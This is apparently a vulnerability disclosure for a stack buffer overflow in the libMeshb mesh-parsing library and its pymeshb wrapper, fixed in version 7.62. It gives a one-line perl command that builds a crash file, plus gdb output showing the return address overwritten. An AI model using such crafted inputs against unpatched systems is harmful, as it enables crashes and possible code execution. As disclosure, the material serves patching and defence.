Authored by Jeremy Brown

libMeshb suffers from a buffer overflow vulnerability. Version 7.62 has been released to address this issue.


libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format and specially crafted .mesh files could allow for arbitrary code execution.


No magic bytes or valid header necessary as the bug appears to be an unbounded fscanf() processing mesh headers.

echo -ne `perl -e 'print "B" x 2176'` > test.mesh


(gdb) r test.mesh /tmp/empty.mesh
Starting program: mesh2poly test.mesh /tmp/empty.mesh

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminatedn") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5 0x000055555555b5d2 in GmfOpenMesh ()
#6 0x4242424242424242 in ?? ()
#7 0x0000000000000000 in ?? ()

(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)

This also affects the python wrapper library pymeshb.

>>> import pymeshb
*** stack smashing detected ***: terminated
Aborted (core dumped)


libMeshb v7.62